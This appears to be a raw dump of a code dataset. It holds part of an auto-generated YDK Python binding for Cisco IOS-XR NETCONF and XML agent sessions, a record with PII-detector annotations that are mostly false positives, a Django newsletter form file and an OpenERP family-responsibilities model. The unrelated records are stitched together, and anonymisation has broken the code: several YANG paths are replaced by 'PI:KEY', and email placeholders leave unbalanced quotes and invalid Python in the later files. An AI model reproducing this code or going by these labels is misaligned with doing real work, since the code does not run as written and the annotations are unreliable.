busy = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXmlSessionStateEnum']
class Netconf(object):
""""""
NETCONF operational information
.. attribute:: agent
NETCONF agent operational information
**type**\: :py:class:`Agent `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.agent = Netconf.Agent()
self.agent.parent = self
class Agent(object):
""""""
NETCONF agent operational information
.. attribute:: tty
NETCONF agent over TTY
**type**\: :py:class:`Tty `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.tty = Netconf.Agent.Tty()
self.tty.parent = self
class Tty(object):
""""""
NETCONF agent over TTY
.. attribute:: sessions
Session information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = Netconf.Agent.Tty.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
Session information
.. attribute:: session
Session information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
Session information
.. attribute:: session_id
Session ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent.Tty.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent.Tty.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent.Tty']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.tty is not None and self.tty._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-xml-ttyagent-oper:netconf'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.agent is not None and self.agent._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf']['meta_info']
class XrXml(object):
""""""
xr xml
.. attribute:: agent
XML agents
**type**\: :py:class:`Agent `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.agent = XrXml.Agent()
self.agent.parent = self
class Agent(object):
""""""
XML agents
.. attribute:: default
Default sessions information
**type**\: :py:class:`Default `
.. attribute:: ssl
SSL sessions information
**type**\: :py:class:`Ssl `
.. attribute:: tty
TTY sessions information
**type**\: :py:class:`Tty `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.default = XrXml.Agent.Default()
self.default.parent = self
self.ssl = XrXml.Agent.Ssl()
self.ssl.parent = self
self.tty = XrXml.Agent.Tty()
self.tty.parent = self
class Tty(object):
""""""
TTY sessions information
.. attribute:: sessions
sessions information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = XrXml.Agent.Tty.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
sessions information
.. attribute:: session
xml sessions information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
xml sessions information
.. attribute:: session_id
Session Id
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Tty.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Tty.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Tty']['meta_info']
class Default(object):
""""""
Default sessions information
.. attribute:: sessions
sessions information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = XrXml.Agent.Default.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
sessions information
.. attribute:: session
xml sessions information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
xml sessions information
.. attribute:: session_id
Session Id
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Default.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Default.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Default']['meta_info']
class Ssl(object):
""""""
SSL sessions information
.. attribute:: sessions
sessions information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = XrXml.Agent.Ssl.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
sessions information
.. attribute:: session
xml sessions information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
xml sessions information
.. attribute:: session_id
Session Id
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Ssl.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Ssl.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Ssl']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.default is not None and self.default._has_data():
return True
if self.ssl is not None and self.ssl._has_data():
return True
if self.tty is not None and self.tty._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-xml-ttyagent-oper:xr-xml'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.agent is not None and self.agent._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml']['meta_info']
",41298,"[['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['PERSON', 'Enum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'e:: '], ['URL', 'ydk.er'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'Netconf.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.tt'], ['URL', 'Netconf.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tt'], ['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'XrXml.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Ag'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'XrXml.Agent.De'], ['URL', 'self.default.pa'], ['URL', 'XrXml.Ag'], ['URL', 'self.ssl.pa'], ['URL', 'self.tt'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci']]"
104,"__author__ = 'Viktor Kerkez dummy@email.com'
__contact__ = dummy@email.com'
__date__ = '20 April 2010'
__copyright__ = 'Copyright (c) 2010 Viktor Kerkez'
import logging
from django import forms
from django.conf import settings
from google.appengine.api import mail
# perart imports
from perart import models
class PerArtForm(forms.ModelForm):
tinymce = True
class ProgramForm(PerArtForm):
class Meta:
model = models.Program
exclude = ['url']
class ProjectForm(PerArtForm):
class Meta:
model = models.Project
exclude = ['url']
class NewsForm(PerArtForm):
class Meta:
model = models.News
exclude = ['url']
class MenuForm(PerArtForm):
tinymce = False
class Meta:
model = models.Menu
exclude = ['url']
class GalleryForm(PerArtForm):
class Meta:
model = models.Gallery
exclude = ['url']
class NewsletterForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
def send_email(self):
try:
mail.send_mail(dummy@email.com',
to=settings.PERART_EMAIL,
subject='""%(name)s"" se prijavio za newsletter' % self.cleaned_data,
body='Ime: %(name)s\nEmail: %(email)s' % self.cleaned_data)
return True
except:
logging.exception('sending message failed')
return False
",1485,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Viktor Kerkez'], ['DATE_TIME', ""'20 April 2010'""], ['DATE_TIME', '2010'], ['PERSON', 'Viktor Kerkez'], ['URL', 'forms.Fo'], ['PERSON', 'PERART_EMAIL'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'django.co'], ['URL', 'forms.Mo'], ['URL', 'models.Pro'], ['URL', 'models.Pro'], ['URL', 'models.Ne'], ['URL', 'models.Me'], ['URL', 'models.Ga'], ['URL', 'forms.Ch'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'settings.PE'], ['URL', 'self.cl'], ['URL', 'self.cl']]"
105,"#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
#
# Pedro Arroyo M dummy@email.com
# Copyright (C) 2015 Mall Connection().
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see .
#
##############################################################################
from osv import osv
from osv import fields
class hr_family_responsibilities(osv.osv):
'''
Open ERP Model
'''
_name = 'hr.family.responsibilities'
_description = 'openerpmodel'
_columns = {
'name':fields.char('Name', size=64, required=True, readonly=False),
'type':fields.selection([
('simple','simple responsibility'),
('maternal','maternal responsibility'),
('invalid','invalid responsibility'),
], 'State', select=True),
'relationship':fields.selection([
('father','father'),
('son','son / daughter'),
('spouse','spouse'),
('Father in law','Father in law / mother in law'),
('son','son / daughter'),
('second','second'),
('Grandfather','Grandfather / Grandmother'),
('grandchild','grandchild / granddaughter'),
('sister','sister / brother'),
('brother in law','brother in law / sister in law'),
], 'Relationship', select=True, readonly=False),
'vat': fields.char('TIN', size=32, help=""Tax Identification Number. Check the box if this contact is subjected to taxes. Used by the some of the legal statements.""),
'employee_id': fields.many2one('hr.employee', string='Employee'),
}
